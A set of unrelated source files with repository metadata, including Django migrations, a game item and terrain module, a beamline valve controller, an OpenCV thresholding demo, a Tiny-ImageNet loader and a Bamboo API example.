1ca54c25efd9250bdc727477130bd4e28d32ef07 | c6f063e2f6ab9aed7743255b8c4b131a3638dd30 | /env1/lib/python3.9/site-packages/webpush/migrations/0003_auto_20211108_1056.py | 22febc2a8208476cc38e6b2d934e7872117439d3 | [] | no_license | Muthoniyahya/agricoope | 31d94ee02e0e5cc650afc251104c6fe4a91cb1b9 | c1ef91866b4646a19825a6d833f78868663d61d1 | refs/heads/master | 2023-09-02T21:33:41.991628 | 2021-11-18T23:22:27 | 2021-11-18T23:22:27 | 429,600,463 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 881 | py | # Generated by Django 3.2.8 on 2021-11-08 10:56
from django.db import migrations, models
class Migration(migrations.Migration):
    """Switch webpush model primary keys from AutoField to BigAutoField."""
    dependencies = [
        ('webpush', '0002_auto_20190603_0005'),
    ]
    operations = [
        migrations.AlterField(
            model_name='group',
            name='id',
            field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
        ),
        migrations.AlterField(
            model_name='pushinformation',
            name='id',
            field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
        ),
        migrations.AlterField(
            model_name='subscriptioninfo',
            name='id',
            field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
        ),
    ]
| [
"Muthoniyahya@gmail.com"
] | Muthoniyahya@gmail.com |
6346038aeef107d5a4c7721f2a780ff4708abbcc | f5b2ee7b630385a8173326aede9b3c43794c4b3e | /server/world/item.py | 5720951d7a49726ebb51efe2d3f6063c6f5e02af | [] | no_license | dslice25/tinymmo-server | 3a324c38475b64220cf6a6bde6ee1277a9bf259b | 2d01212a8ce6ba9ecc87e2fcf2a3c4979255e926 | refs/heads/master | 2021-01-23T10:07:33.355822 | 2017-12-08T21:02:06 | 2017-12-08T21:02:06 | 102,606,582 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,571 | py | import ConfigParser
import uuid
class Item:
    """A game item whose stats are loaded from server_data/items.ini.

    Each instance gets a random UUID as its unique ``name`` (the INI section
    name selects the stats) and registers itself in ``world.items``.
    """
    # NOTE(review): `index`/`getid` look like dead code — names are UUID-based
    # now (see the commented-out line in __init__); confirm no caller uses
    # getid() before removing.
    index = 0
    # NOTE: the items config file is read once, at class-definition (import) time.
    config = ConfigParser.RawConfigParser()
    config.read('server_data/items.ini')
    def getid(self):
        # Monotonically increasing counter shared by all Item instances.
        Item.index += 1
        return Item.index
    def __init__(self, name, player, container, equipped, world):
        #self.name = "%s-%s" % (name, self.getid())
        # Random unique identifier; `name` (the arg) is only the INI section key.
        self.name = str(uuid.uuid4())
        self.player = player
        self.container = container
        self.equipped = equipped
        self.world = world
        # Stats pulled from the [name] section of items.ini.
        self.title = Item.config.get(name, 'title')
        self.gear_type = Item.config.get(name, 'gear_type')
        self.slot = Item.config.get(name, 'slot')
        self.hit = Item.config.getint(name, 'hit')
        self.dam = Item.config.getint(name, 'dam')
        self.arm = Item.config.getint(name, 'arm')
        self.spi = Item.config.getint(name, 'spi')
        self.hp = Item.config.getint(name, 'hp')
        self.mp = Item.config.getint(name, 'mp')
        self.speed = Item.config.getfloat(name, 'speed')
        self.icon = Item.config.get(name,'icon')
        self.value = Item.config.getint(name, 'value')
        self.consumeable = Item.config.getboolean(name, 'consumeable')
        # Register globally so the world can look this item up by name.
        self.world.items[self.name] = self
    def state(self):
        # Serializable snapshot of the item for sending to clients.
        return { 'title': self.title, 'name': self.name, 'slot': self.slot, 'equipped': self.equipped, 'gear_type': self.gear_type, 'icon': self.icon, 'hit': self.hit, 'dam': self.dam, 'arm': self.arm, 'spi': self.spi, 'speed': self.speed, 'value': self.value, 'hp': self.hp, 'mp': self.mp, 'consumeable': self.consumeable }
| [
"dablum@mit.edu"
] | dablum@mit.edu |
09c006664cf108d6ae9fc0f41fcb8e22fcea4877 | a9e60d0e5b3b5062a81da96be2d9c748a96ffca7 | /configurations/i21-config/scripts/functions/sample_vessel_vacuum_control.py | 055be6350f0c567e280cfe42194b79f557165ef8 | [] | no_license | openGDA/gda-diamond | 3736718596f47607335ada470d06148d7b57526e | bbb64dcfd581c30eddb210c647db5b5864b59166 | refs/heads/master | 2023-08-16T08:01:11.075927 | 2023-08-15T16:01:52 | 2023-08-15T16:01:52 | 121,757,699 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,543 | py | '''
define function to control the sample vessel vacuum valves for sample changes
Created on 18 Jul 2023
@author: fy65
'''
import installation
from gda.device.scannable import ScannableMotionBase
from gda.epics import CAClient
# control PV = BL21I-EA-SMPL-01:SEQ:CTRL
# state PV = BL21I-EA-SMPL-01:SEQ:CTRL:STATE_RBV
class SampleVesselValvesControl(ScannableMotionBase):
    """Scannable controlling the sample-vessel vacuum valves via EPICS.

    Writes 0/1 to the control PV (0 = Close, 1 = Open) and reads readiness
    from the ``:STATE_RBV`` PV. In dummy installations the state is kept in
    ``self.val`` and actions are only printed.
    """
    def __init__(self, name, pv):
        self.setName(name)
        self.setInputNames([name])
        self.setOutputFormat(["%d"])
        # Separate channels: one for commanding, one for the readback state.
        self.control = CAClient(pv)
        self.state = CAClient(pv + ":STATE_RBV")
        self.control.configure()
        self.state.configure()
        # Simulated position used only in dummy mode.
        self.val = 0
    def getPosition(self):
        if installation.isLive():
            return int(self.control.get()) #0 - Close, 1 - Open
        if installation.isDummy():
            return self.val
    def asynchronousMoveTo(self, val):
        if installation.isLive():
            self.control.caput(int(val))
        if installation.isDummy():
            self.val = val
            if val == 1:
                print("Open sample vessel valves")
            if val == 0:
                print("Close sample vessel valves")
    def isBusy(self):
        # NOTE(review): reads use self.control.get() in getPosition but
        # self.state.caget() here — presumably both are valid CAClient read
        # calls; confirm the API is consistent.
        if installation.isLive():
            return int(self.state.caget()) != 2 #2 - Ready, 1 - Opening, 0 - Closing
        if installation.isDummy():
            return False
# Module-level singleton for the beamline's sample-vessel valve sequence PV.
sample_vessel_valves = SampleVesselValvesControl("sample_vessel_valves", "BL21I-EA-SMPL-01:SEQ:CTRL")
| [
"fajin.yuan@diamond.ac.uk"
] | fajin.yuan@diamond.ac.uk |
2908f0e3db2a300277114b39d46d25d3ea5e1012 | 2d3976964d8923a1e91e31af702bd68fbf37d474 | /runTask/server.py | 1bd36c0754e0d042ad090870e35b568521b7c88d | [] | no_license | barry800414/master_thesis | 2f6900fb2964891849dadef9283ed6e7f11cc696 | 01a0cac30ab63fcf818f1f43959634094b624af5 | refs/heads/master | 2020-05-29T08:53:32.810702 | 2016-06-04T02:03:52 | 2016-06-04T02:03:52 | 38,382,667 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 609 | py | #!/usr/bin/env python3
from multiprocessing.managers import BaseManager
import queue
import sys
if __name__ == '__main__':
    # TCP port for the shared task queue; optionally overridden by argv[1].
    port = 3333
    if len(sys.argv) == 2:
        port = int(sys.argv[1])
    q = queue.Queue()
    # a QueueManager hold a queue q, which automatically handle race condition
    class QueueManager(BaseManager):
        pass
    # Clients call m.get_queue() to obtain a proxy to the single shared queue.
    QueueManager.register('get_queue', callable = lambda: q)
    # NOTE(review): authkey is hard-coded; clients must connect with the same key.
    m = QueueManager(address = ('0.0.0.0', port), authkey = b'barry800414')
    s = m.get_server()
    print('Server is running now (port:%d) ...' % (port), file=sys.stderr)
    # Blocks forever serving queue requests.
    s.serve_forever()
| [
"barry800414@gmail.com"
] | barry800414@gmail.com |
25511219866cbb40fbd6b80bfdc1df6200549f29 | db46e847a9e382bcc7e062cfbac52fbac0cea490 | /Bolum1/otsu1.py | ef7e7265b90e4fec9241caa5466f6d9d53430f01 | [] | no_license | pnarbedir/ImageProcessing | 137ecb3a027afbb41573466415e570055ac00ad5 | 94f4778e773c1ffdda398e6da3824267b7c68651 | refs/heads/master | 2023-05-02T13:10:15.254882 | 2021-05-16T00:28:42 | 2021-05-16T00:28:42 | 363,901,232 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 440 | py | import cv2
import numpy as np
from matplotlib import pyplot as plt
# Load the source image as 8-bit grayscale (flag 0).
img = cv2.imread('original.jfif',0)
# Fixed threshold at 127, for comparison with Otsu below.
ret,th1 = cv2.threshold(img,127,255,cv2.THRESH_BINARY)
# Otsu's method chooses the threshold automatically (the 0 argument is ignored).
ret,th2 = cv2.threshold(img,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)
# Gaussian smoothing first, then Otsu — usually better on noisy images.
blur = cv2.GaussianBlur(img,(5,5),0)
ret,th3 = cv2.threshold(blur,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)
cv2.imshow('orj',img)
cv2.imshow('th1',th1)
cv2.imshow('th2',th2)
cv2.imshow('th3',th3)
# NOTE(review): no destroyAllWindows(); windows are torn down on process exit.
cv2.waitKey()
| [
"pnarbedir98@gmail.com"
] | pnarbedir98@gmail.com |
92ec94b88e74f9385c3753e035a3676a25f2ecc7 | 6e5c2ba6cd380af56d7714cd6b3ec31b0e0d947e | /src/error_single.py | 082454e4f3df909b97bfed7a7eed20a83a2d8748 | [] | no_license | luedu/Bokeh-Effect | 74a0d2b2800a458da9983d377418542bf40d409c | f985dd366918f35de92ec118ca0b4783812ad4d6 | refs/heads/master | 2022-04-17T12:32:54.975888 | 2020-04-19T14:10:54 | 2020-04-19T14:10:54 | 257,001,932 | 0 | 0 | null | 2020-04-19T13:08:40 | 2020-04-19T13:08:40 | null | UTF-8 | Python | false | false | 1,794 | py | import torch
import cv2
import sys
from utils import dice_coeff,dice_loss,normalization,denormalize,ab_rel_diff,sq_rel_diff,rms_linear
import numpy as np
def set_requires_grad(nets, requires_grad=False):
    """Enable or disable gradient tracking on one network or a list of them.

    ``None`` entries in the list are silently skipped.
    """
    networks = nets if isinstance(nets, list) else [nets]
    for network in networks:
        if network is None:
            continue
        for parameter in network.parameters():
            parameter.requires_grad = requires_grad
# CLI: error_single.py <model file> <c|p> <image path> <ground-truth depth path>
modelName = sys.argv[1]
modelType = sys.argv[2]
imagePath = sys.argv[3]
depthMap = sys.argv[4]
image = cv2.resize(cv2.imread(imagePath),(256,256), interpolation=cv2.INTER_CUBIC)
depth = cv2.resize(cv2.imread(depthMap),(256,256), interpolation=cv2.INTER_CUBIC)
# NOTE(review): reshape(1,3,256,256) reinterprets the HWC buffer rather than
# transposing to CHW — presumably a permute/transpose was intended; confirm
# this matches how the models were trained.
image = torch.from_numpy(np.array(image).reshape(1,3,256,256)).float()
depth = torch.from_numpy(np.array(depth).reshape(1,3,256,256)).float()
# 'c' = CycleGAN checkpoint, 'p' = pix2pix checkpoint.
if modelType == 'c' :
    model = torch.load("../CGmodel/"+modelName)
    gen = model.G_XtoY
elif modelType == 'p' :
    model = torch.load("../P2Pmodel/"+modelName)
    gen = model.G
else:
    print("Choose a model type from 'c/p'")
    exit(1)
# Inference only: freeze the generator's parameters.
set_requires_grad(gen,False)
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
image = normalization(image).to(device)
pred_depth = gen.to(device).forward(image)
depth = normalization(depth).to(device)
cv2.imwrite("testDepth.jpg", np.array(denormalize(depth).cpu().detach()).reshape(256,256,3))
pred_depth = denormalize(pred_depth,flag=1)
depth = denormalize(depth,flag=1)
# dice=dice_coeff(pred_depth,depth)
# Standard monocular-depth error metrics (see utils).
rel_dif = ab_rel_diff(pred_depth,depth)
sq_rel_dif = sq_rel_diff(pred_depth,depth)
rms = rms_linear(pred_depth,depth)
# print("Dice Coefficient is : ", dice)
print("Absolute Relative Difference is : ", rel_dif)
print("Square Relative Difference is : ", sq_rel_dif)
print("RMS Difference is : ", rms)
| [
"yashkhem1@gmail.com"
] | yashkhem1@gmail.com |
fe57a510beaf39e45c60b51b452a5c31026ab28d | 3ecce3646d66033d214db3749be63e78d4f663e9 | /Assignment 4/load_utils.py | 9b4f3fc6a5fb3ab71f6dc4b5ce5cbba2fb817a22 | [
"Apache-2.0"
def load_tiny_imagenet(path, dtype=np.float32, subtract_mean=True):
    """Load the Tiny-ImageNet-200 dataset from `path`.

    Reads wnids.txt/words.txt for labels, then the train/val/test image
    trees. Returns a dict with class_names, X_train/y_train, X_val/y_val,
    X_test/y_test (y_test is None when no annotations file exists) and the
    training mean image. When `subtract_mean` is True the mean image is
    subtracted from all three splits in place.

    FIX: the returned dict previously listed the 'class_names' key twice;
    the duplicate has been removed (the value was identical, so behavior
    is unchanged).
    """
    # First load wnids
    with open(os.path.join(path, 'wnids.txt'), 'r') as f:
        wnids = [x.strip() for x in f]
    # Map wnids to integer labels
    wnid_to_label = {wnid: i for i, wnid in enumerate(wnids)}
    # Use words.txt to get names for each class
    with open(os.path.join(path, 'words.txt'), 'r') as f:
        wnid_to_words = dict(line.split('\t') for line in f)
        for wnid, words in wnid_to_words.items():
            wnid_to_words[wnid] = [w.strip() for w in words.split(',')]
    class_names = [wnid_to_words[wnid] for wnid in wnids]
    # Next load training data.
    X_train = []
    y_train = []
    for i, wnid in enumerate(wnids):
        if (i + 1) % 20 == 0:
            print(f'loading training data for synset {(i + 1)}/{len(wnids)}')
        # To figure out the filenames we need to open the boxes file
        boxes_file = os.path.join(path, 'train', wnid, '%s_boxes.txt' % wnid)
        with open(boxes_file, 'r') as f:
            filenames = [x.split('\t')[0] for x in f]
        num_images = len(filenames)
        X_train_block = np.zeros((num_images, 64, 64, 3), dtype=dtype)
        y_train_block = wnid_to_label[wnid] * np.ones(num_images, dtype=np.int64)
        for j, img_file in enumerate(filenames):
            img_file = os.path.join(path, 'train', wnid, 'images', img_file)
            img = imread(img_file)
            if img.ndim == 2:
                ## grayscale file
                img.shape = (64, 64, 1)
            X_train_block[j] = img.transpose(1, 0, 2)
        X_train.append(X_train_block)
        y_train.append(y_train_block)
    # We need to concatenate all training data
    X_train = np.concatenate(X_train, axis=0)
    y_train = np.concatenate(y_train, axis=0)
    # Next load validation data
    with open(os.path.join(path, 'val', 'val_annotations.txt'), 'r') as f:
        img_files = []
        val_wnids = []
        for line in f:
            img_file, wnid = line.split('\t')[:2]
            img_files.append(img_file)
            val_wnids.append(wnid)
    num_val = len(img_files)
    y_val = np.array([wnid_to_label[wnid] for wnid in val_wnids])
    X_val = np.zeros((num_val, 64, 64, 3), dtype=dtype)
    for i, img_file in enumerate(img_files):
        img_file = os.path.join(path, 'val', 'images', img_file)
        img = imread(img_file)
        if img.ndim == 2:
            img.shape = (64, 64, 1)
        X_val[i] = img.transpose(1, 0, 2)
    # Next load test images
    # Students won't have test labels, so we need to iterate over files in the
    # images directory.
    img_files = os.listdir(os.path.join(path, 'test', 'images'))
    X_test = np.zeros((len(img_files), 64, 64, 3), dtype=dtype)
    for i, img_file in enumerate(img_files):
        img_file = os.path.join(path, 'test', 'images', img_file)
        img = imread(img_file)
        if img.ndim == 2:
            img.shape = (64, 64, 1)
        X_test[i] = img.transpose(1, 0, 2)
    y_test = None
    y_test_file = os.path.join(path, 'test', 'test_annotations.txt')
    if os.path.isfile(y_test_file):
        with open(y_test_file, 'r') as f:
            img_file_to_wnid = {}
            for line in f:
                line = line.split('\t')
                img_file_to_wnid[line[0]] = line[1]
        y_test = [wnid_to_label[img_file_to_wnid[img_file]] for img_file in img_files]
        y_test = np.array(y_test)
    mean_image = X_train.mean(axis=0)
    if subtract_mean:
        X_train -= mean_image[None]
        X_val -= mean_image[None]
        X_test -= mean_image[None]
    return {
        'class_names': class_names,
        'X_train': X_train,
        'y_train': y_train,
        'X_val': X_val,
        'y_val': y_val,
        'X_test': X_test,
        'y_test': y_test,
        'mean_image': mean_image,
    }
# Load the whole dataset once at import time (mean-subtracted float32 arrays).
data = load_tiny_imagenet('/content/tiny-imagenet-200/', dtype=np.float32, subtract_mean=True)
| [
"vishal114186@gmail.com"
] | vishal114186@gmail.com |
9ba996ef80069b6979c8495ddbf3ffbab87f533c | d0af71157005190c6421b640b0e6cee2f237aace | /examples/bamboo/bamboo_plan_directory_info.py | 9706338f0eb798ba9532324312cadf808092d542 | [
"Apache-2.0"
] | permissive | atlassian-api/atlassian-python-api | d8adeb43ea4c92c10a03f1b53b53b87820f1841d | bb1c0f2d4187ba8efa1a838cd0041b54c944fee8 | refs/heads/master | 2023-08-29T06:57:22.136461 | 2023-08-27T18:53:00 | 2023-08-27T18:53:00 | 19,530,263 | 1,130 | 679 | Apache-2.0 | 2023-09-13T19:27:44 | 2014-05-07T10:26:26 | Python | UTF-8 | Python | false | false | 433 | py | # coding=utf-8
import os
from atlassian import Bamboo
# Connection settings come from the environment, with local-dev defaults.
BAMBOO_URL = os.environ.get("BAMBOO_URL", "http://localhost:8085")
ATLASSIAN_USER = os.environ.get("ATLASSIAN_USER", "admin")
ATLASSIAN_PASSWORD = os.environ.get("ATLASSIAN_PASSWORD", "admin")
bamboo = Bamboo(url=BAMBOO_URL, username=ATLASSIAN_USER, password=ATLASSIAN_PASSWORD)
# Fetch and print the directory info for the given plan key.
plan_directories_roots = bamboo.plan_directory_info("PROJ-PLAN")
print(plan_directories_roots)
| [
"noreply@github.com"
] | atlassian-api.noreply@github.com |
9138de1148cd345ac2d731ad25502eed850fa264 | 2d83d627c446fa84e301f27196f893902066a8a3 | /smartcity/dbview/migrations/0008_auto_20171030_1950.py | 8a2f889d476a5e7077de8a008cc9e650156ad104 | [] | no_license | PoeticIron/ifb299-57lines | 1e71a79c97a05c0ff7e6c1651469dbd0904385a7 | 837d49437c674daafec805c8f4b1a6c7f595eedf | refs/heads/master | 2021-01-01T18:36:47.580779 | 2017-11-03T05:42:05 | 2017-11-03T05:42:05 | 98,384,561 | 0 | 2 | null | 2017-09-19T07:34:37 | 2017-07-26T05:51:16 | Python | UTF-8 | Python | false | false | 639 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-10-30 09:50
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Default museum coordinates to the Brisbane CBD latitude/longitude."""
    dependencies = [
        ('dbview', '0007_auto_20171030_1947'),
    ]
    operations = [
        migrations.AlterField(
            model_name='museums',
            name='Lat',
            field=models.CharField(default='-27.4772', max_length=30),
        ),
        migrations.AlterField(
            model_name='museums',
            name='Lon',
            field=models.CharField(default='153.0278', max_length=30),
        ),
    ]
| [
"nmestone@gmail.com"
] | nmestone@gmail.com |
5991aa7286b2e0849710359d66a0645c362da72d | 3b3be533e7fd90a84c54693975dd1809a8814e92 | /terrains.py | 4dffc6e4808ac39e3c204805f9124af000578d2e | [] | no_license | Fenrir127/advance_wars | ed9e91013fb7972d39557551b0a7964a255115a1 | 736eecde986111fa15f452f292201d2abb483a4e | refs/heads/main | 2023-03-27T13:21:32.349864 | 2021-03-26T03:14:57 | 2021-03-26T03:14:57 | 304,418,098 | 0 | 0 | null | 2021-02-20T00:02:20 | 2020-10-15T18:41:44 | Python | UTF-8 | Python | false | false | 9,912 | py | from os import path
from sprites import *
from setting import *
"""
This contains all the information for the different terrain in the game
Nothing should change in there unless there's a way to change terrain in the game which I don't think there is (except building hp)
"""
# This is the master class Terrain which only serves to pass on the function get_mvt_cost()
class Terrain:
    """Base class for every map tile.

    Holds one movement-cost attribute per movement class; concrete terrain
    subclasses overwrite them (a cost of 0 means impassable for that class).
    """

    def __init__(self, game):
        self.game = game
        self.terrain_type = None
        # Filled in by each concrete terrain subclass.
        self.infantry_mvt_cost = None
        self.mech_mvt_cost = None
        self.tires_mvt_cost = None
        self.tread_mvt_cost = None
        self.air_mvt_cost = None
        self.ship_mvt_cost = None
        self.transport_mvt_cost = None

    def get_mvt_cost(self, type):
        """Return this tile's movement cost for the given movement class."""
        cost_table = (
            (INFANTRY, self.infantry_mvt_cost),
            (MECH, self.mech_mvt_cost),
            (TIRES, self.tires_mvt_cost),
            (TREAD, self.tread_mvt_cost),
            (AIR, self.air_mvt_cost),
            (SHIP, self.ship_mvt_cost),
            (TRANSPORT, self.transport_mvt_cost),
        )
        for mvt_class, cost in cost_table:
            if type == mvt_class:
                return cost
        # Unknown movement class: report it and fall through (returns None).
        print("get_mvt_cost was given the wrong input:")
        print(type)
class Plain(Terrain):
    """Open plain: easy going for ground units, slightly slow for tires."""

    def __init__(self, game, x, y):
        super().__init__(game)
        self.sprite = Plain_sprite(game, x, y)
        self.name = "Plain"
        self.defense = 1
        self.type = LAND
        # Movement cost per movement class; 0 means that class cannot enter.
        for attr, cost in {
            "infantry_mvt_cost": 1,
            "mech_mvt_cost": 1,
            "tires_mvt_cost": 2,
            "tread_mvt_cost": 1,
            "air_mvt_cost": 1,
            "ship_mvt_cost": 0,
            "transport_mvt_cost": 0,
        }.items():
            setattr(self, attr, cost)
class River(Terrain):
    """River: foot units can wade across; vehicles and ships cannot enter."""

    def __init__(self, game, x, y):
        super().__init__(game)
        self.sprite = River_sprite(game, x, y)
        self.name = "River"
        self.defense = 0
        self.type = LAND
        # Movement cost per movement class; 0 means that class cannot enter.
        for attr, cost in {
            "infantry_mvt_cost": 2,
            "mech_mvt_cost": 1,
            "tires_mvt_cost": 0,
            "tread_mvt_cost": 0,
            "air_mvt_cost": 1,
            "ship_mvt_cost": 0,
            "transport_mvt_cost": 0,
        }.items():
            setattr(self, attr, cost)
class Wood(Terrain):
    """Woodland: good cover, but slows wheeled and tracked vehicles."""

    def __init__(self, game, x, y):
        super().__init__(game)
        self.sprite = Wood_sprite(game, x, y)
        self.name = "Wood"
        self.defense = 2
        self.type = LAND
        # Movement cost per movement class; 0 means that class cannot enter.
        for attr, cost in {
            "infantry_mvt_cost": 1,
            "mech_mvt_cost": 1,
            "tires_mvt_cost": 3,
            "tread_mvt_cost": 2,
            "air_mvt_cost": 1,
            "ship_mvt_cost": 0,
            "transport_mvt_cost": 0,
        }.items():
            setattr(self, attr, cost)
class Mountain(Terrain):
    """Mountain: best defensive ground; only foot and air units can cross."""

    def __init__(self, game, x, y):
        super().__init__(game)
        self.sprite = Mountain_sprite(game, x, y)
        self.name = "Mountain"
        self.defense = 4
        self.type = LAND
        # Movement cost per movement class; 0 means that class cannot enter.
        for attr, cost in {
            "infantry_mvt_cost": 2,
            "mech_mvt_cost": 1,
            "tires_mvt_cost": 0,
            "tread_mvt_cost": 0,
            "air_mvt_cost": 1,
            "ship_mvt_cost": 0,
            "transport_mvt_cost": 0,
        }.items():
            setattr(self, attr, cost)
class Sea(Terrain):
    """Open water: only naval and air units may enter."""

    def __init__(self, game, x, y):
        super().__init__(game)
        self.sprite = Sea_sprite(game, x, y)
        self.name = "Sea"
        self.defense = 0
        self.type = WATER
        # Movement cost per movement class; 0 means that class cannot enter.
        for attr, cost in {
            "infantry_mvt_cost": 0,
            "mech_mvt_cost": 0,
            "tires_mvt_cost": 0,
            "tread_mvt_cost": 0,
            "air_mvt_cost": 1,
            "ship_mvt_cost": 1,
            "transport_mvt_cost": 1,
        }.items():
            setattr(self, attr, cost)
class Beach(Terrain):
    """Beach: land units can cross it and naval transports can dock on it."""

    def __init__(self, game, x, y):
        super().__init__(game)
        self.sprite = Beach_sprite(game, x, y)
        # BUG FIX: the name was copy-pasted from the Sea class as "Sea";
        # this tile is a Beach.
        self.name = "Beach"
        self.defense = 0
        self.type = WATER
        # every terrain class must define the mvt cost for all movement types
        # when a mvt_type cost is 0, it means units with this type of mvt cannot go on the tile
        self.infantry_mvt_cost = 1
        self.mech_mvt_cost = 1
        self.tires_mvt_cost = 2
        self.tread_mvt_cost = 1
        self.air_mvt_cost = 1
        self.ship_mvt_cost = 0
        self.transport_mvt_cost = 1
class Road(Terrain):
    """Road: fastest ground movement, but offers no defensive cover."""

    def __init__(self, game, x, y):
        super().__init__(game)
        self.sprite = Road_sprite(game, x, y)
        self.name = "Road"
        self.defense = 0
        self.type = LAND
        # Movement cost per movement class; 0 means that class cannot enter.
        for attr, cost in {
            "infantry_mvt_cost": 1,
            "mech_mvt_cost": 1,
            "tires_mvt_cost": 1,
            "tread_mvt_cost": 1,
            "air_mvt_cost": 1,
            "ship_mvt_cost": 0,
            "transport_mvt_cost": 0,
        }.items():
            setattr(self, attr, cost)
class City(Terrain):
    """Capturable city tile: generates income each turn and can change hands."""

    def __init__(self, game, x, y, owner):
        super().__init__(game)
        self.sprite = City_sprite(game, x, y, owner)
        self.name = "City"
        self.defense = 3
        self.type = BUILDING
        self.building_type = LAND
        self.hp = 20
        self.x = x
        self.y = y
        # Movement cost per movement class; 0 means that class cannot enter.
        for attr, cost in {
            "infantry_mvt_cost": 1,
            "mech_mvt_cost": 1,
            "tires_mvt_cost": 1,
            "tread_mvt_cost": 1,
            "air_mvt_cost": 1,
            "ship_mvt_cost": 0,
            "transport_mvt_cost": 0,
        }.items():
            setattr(self, attr, cost)
        # Neutral cities have no owner; owned ones join the owner's roster.
        self.owner = owner
        if owner is not None:
            self.owner.buildings.append(self)

    def add_funds(self):
        """Pay the per-turn building income to the owning player."""
        self.owner.funds += 1000

    def new_owner(self, player):
        """Transfer the city to *player*, swapping the sprite to their colours."""
        self.owner.buildings.remove(self)
        self.sprite.kill()
        self.sprite = City_sprite(self.game, self.x, self.y, player)
        self.owner = player
        self.owner.buildings.append(self)
class Factory(Terrain):
    """Capturable factory: generates income each turn and can change hands."""
    # NOTE(review): name is lowercase "factory" while siblings use "City"/"HQ";
    # left unchanged in case other code matches on the exact string.

    def __init__(self, game, x, y, owner):
        super().__init__(game)
        self.sprite = Factory_sprite(game, x, y, owner)
        self.name = "factory"
        self.defense = 3
        self.type = BUILDING
        self.building_type = LAND
        self.hp = 20
        self.x = x
        self.y = y
        # every terrain class must define the mvt cost for all movement types
        # when a mvt_type cost is 0, it means units with this type of mvt cannot go on the tile
        self.infantry_mvt_cost = 1
        self.mech_mvt_cost = 1
        self.tires_mvt_cost = 1
        self.tread_mvt_cost = 1
        self.air_mvt_cost = 1
        self.ship_mvt_cost = 0
        self.transport_mvt_cost = 0
        self.owner = owner
        if owner is not None:
            self.owner.buildings.append(self)

    def add_funds(self):
        """Pay the per-turn building income to the owning player."""
        self.owner.funds += 1000

    def new_owner(self, player):
        """Transfer the factory to *player*, swapping the sprite to their colours.

        BUG FIX: the sprite was previously rebuilt with City_sprite (copy-paste
        from the City class), so a captured factory turned into a city graphic.
        """
        self.owner.buildings.remove(self)
        self.sprite.kill()
        self.sprite = Factory_sprite(self.game, self.x, self.y, player)
        self.owner = player
        self.owner.buildings.append(self)
class HQ(Terrain):
    """Headquarters building: capturing it ends the game."""
    def __init__(self, game, x, y, owner):
        super().__init__(game) # the super init doesn't really do anything for now
        self.sprite = Hq_sprite(game, x, y, owner)
        self.name = "HQ"
        self.defense = 4
        self.type = BUILDING
        self.building_type = LAND
        self.hp = 20
        self.x = x
        self.y = y
        # every terrain class must define the mvt cost for all movement types
        # when a mvt_type cost is 0, it means units with this type of mvt cannot go on the tile
        self.infantry_mvt_cost = 1
        self.mech_mvt_cost = 1
        self.tires_mvt_cost = 1
        self.tread_mvt_cost = 1
        self.air_mvt_cost = 1
        self.ship_mvt_cost = 0
        self.transport_mvt_cost = 0
        self.owner = owner
        if owner is not None:
            self.owner.buildings.append(self)
    def add_funds(self):
        # Per-turn building income, same amount as cities/factories.
        self.owner.funds += 1000
    def new_owner(self, player):
        # Capturing the HQ is the win condition: show the message, redraw once,
        # then terminate the whole process.
        print("You win the game!")
        # NOTE(review): this first assignment is immediately overwritten below;
        # redundant unless the text setter has side effects — confirm.
        self.game.preview_text.text = ""
        self.game.preview_text.text = "You win the game!!!"
        self.game.draw()
        # NOTE(review): exit() kills the process with no cleanup or return to menu.
        exit()
| [
"noreply@github.com"
] | Fenrir127.noreply@github.com |
f28ba09e107306b65b13e2ac8683488c3fbf89a0 | 13152e95d8f0fa7c9b9bcb0be368b869b8c34b0f | /apps/diary/migrations/0003_auto_20180929_1857.py | 869839b1cbe31778bbda7881611ab44efa2b9530 | [] | no_license | Emiyaaaaa/personalweb | 75872239a963ce59665735a2c9bfff46dc2a671a | a4d47dc9a3a5fdf1c3d24d587a177e19b878b661 | refs/heads/master | 2021-06-03T09:22:31.201318 | 2020-09-02T07:16:49 | 2020-09-02T07:16:49 | 148,086,883 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 386 | py | # Generated by Django 2.1.1 on 2018-09-29 18:57
from django.db import migrations
class Migration(migrations.Migration):
    """Set human-readable verbose names on the DiaryComment model."""
    dependencies = [
        ('diary', '0002_diary_diarycomment'),
    ]
    operations = [
        migrations.AlterModelOptions(
            name='diarycomment',
            options={'verbose_name': '评论', 'verbose_name_plural': '评论'},
        ),
    ]
| [
"2914034404@qq.com"
] | 2914034404@qq.com |
f50f22f4257ef2bd4b135c4c4b543869c019f8b8 | 4eeb40dcc265caf4a2b84bc90a28d481930d6a8a | /cssproject/cssproject/wsgi.py | e87cec6d202682e65310c1cd76e7ac0245d43209 | [] | no_license | mprasu/Sample-Projects | eb7fc46e81b09d7c97c238047e3c93b6fff3fb8d | 7363baf630900ab2babb4af2afe77911d8a548b2 | refs/heads/master | 2020-04-16T06:43:16.345750 | 2019-01-12T07:07:34 | 2019-01-12T07:07:34 | 165,358,055 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 397 | py | """
WSGI config for cssproject project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "cssproject.settings")
application = get_wsgi_application()
| [
"muppuriprasanna5@gmail.com"
] | muppuriprasanna5@gmail.com |
